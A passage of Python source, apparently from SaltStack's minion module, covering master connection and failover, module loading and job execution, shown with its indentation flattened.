string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Carbon',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
def eval_master_func(opts):
'''
Evaluate master function if master type is 'func'
and save it result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod, fun = opts['master'].split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
# we take whatever the module returns as master address
opts['master'] = master_mod[mod + '.' + fun]()
opts['__master_func_evaluated'] = True
except TypeError:
log.error("Failed to evaluate master address from module '{0}'".format(
opts['master']))
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(master_mod))
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons')
if b_conf:
return self.beacons.process(b_conf) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# check if master_type was altered from its default
elif opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
if opts['master_failback']:
secondary_masters = opts['master'][1:]
shuffle(secondary_masters)
opts['master'][1:] = secondary_masters
else:
shuffle(opts['master'])
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], str) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
log.info('Moving possibly failed master {0} to the end of'
' the list of masters'.format(opts['master']))
if opts['master'] in opts['master_list']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, minion have to failover on DNS errors instead of retry DNS resolve.
# See issue 21082 for details
if opts['retry_dns']:
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# FIXME: if SMinion don't define io_loop, it can't switch master see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
local_masters = copy.copy(opts['master'])
last_exc = None
while True:
attempts += 1
if tries > 0:
log.debug('Connecting to master. Attempt {0} '
'of {1}'.format(attempts, tries)
)
else:
log.debug('Connecting to master. Attempt {0} '
'(infinite attempts)'.format(attempts)
)
for master in local_masters:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
self.opts = opts
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = local_masters
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
msg = ('No master could be reached or all masters '
'denied the minions connection attempt.')
log.error(msg)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
while True:
attempts += 1
if tries > 0:
log.debug('Connecting to master. Attempt {0} '
'of {1}'.format(attempts, tries)
)
else:
log.debug('Connecting to master. Attempt {0} '
'(infinite attempts)'.format(attempts)
)
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
io_loop = LOOP_CLASS.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['environment'] is not None:
penv = self.opts['environment']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.fopen(ptop, 'wb') as fp_:
fp_.write(yaml.dump(cache_top))
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.fopen(cache_sls, 'wb') as fp_:
fp_.write(yaml.dump(self.opts['pillar']))
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
if self.opts.get('master_type') != 'disable':
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
# timeout for one of the minions to auth with a master
MINION_CONNECT_TIMEOUT = 5
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
masters = self.opts['master']
if self.opts['master_type'] == 'failover' or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
s_opts['auth_timeout'] = self.MINION_CONNECT_TIMEOUT
minion = Minion(s_opts,
self.MINION_CONNECT_TIMEOUT,
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
)
self.minions.append(minion)
self.io_loop.spawn_callback(self._connect_minion, minion)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = minion.opts['acceptance_wait_time']
while True:
try:
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(minion.opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(minion.opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
if io_loop is None:
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')] # pylint: disable=no-member
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
log.info('Creating minion process manager')
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, async=True)
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
exit(0)
def sync_connect_master(self, timeout=None):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
future_exception = self._connect_master_future.exc_info()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=['__master_alive'])
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
'__master_alive_{0}'.format(self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
'__master_failback':
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job('__master_failback', persist=True)
else:
self.schedule.delete_job('__master_alive_{0}'.format(self.opts['master']), persist=True)
self.schedule.delete_job('__master_failback', persist=True)
self.grains_cache = self.opts['grains']
self.ready = True
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: {0} or return_retry_timer_max: {1})'
'both must be a positive integers'.format(
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions)
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
channel = salt.transport.Channel.factory(self.opts)
return channel.send(load, timeout=timeout)
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
def timeout_handler(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
return True
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.push(self.functions.context_dict.clone())
exitstack.push(self.returners.context_dict.clone())
exitstack.push(self.executors.context_dict.clone())
return exitstack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules()
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if sys.platform.startswith('win') and \
opts['multiprocessing'] and \
not salt.log.setup.is_logging_configured():
# We have to re-init the logging system for Windows
salt.log.setup.setup_console_logger(log_level=opts.get('log_level', 'info'))
if opts.get('log_file'):
salt.log.setup.setup_logfile_logger(opts['log_file'], opts.get('log_level_logfile', 'info'))
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
# this minion is blacked out. Only allow saltutil.refresh_pillar
if function_name != 'saltutil.refresh_pillar' and \
function_name not in minion_instance.opts['pillar'].get('minion_blackout_whitelist', []):
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
executors = data.get('module_executors') or opts.get('module_executors', ['direct_call.get'])
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo.get':
if executors[-1] in FUNCTION_EXECUTORS:
executors[-1] = 'sudo.get' # replace
else:
executors.append('sudo.get') # append
log.trace('Executors list {0}'.format(executors)) # pylint: disable=no-member
# Get executors
def get_executor(name):
executor_class = minion_instance.executors.get(name)
if executor_class is None:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return executor_class
# Get the last one that is function executor
executor = get_executor(executors.pop())(opts, data, func, args, kwargs)
# Instantiate others from bottom to the top
for executor_name in reversed(executors):
executor = get_executor(executor_name)(opts, data, executor)
return_data = executor.execute()
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in \'{0}\' had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing \'{0}\': {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__, )
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
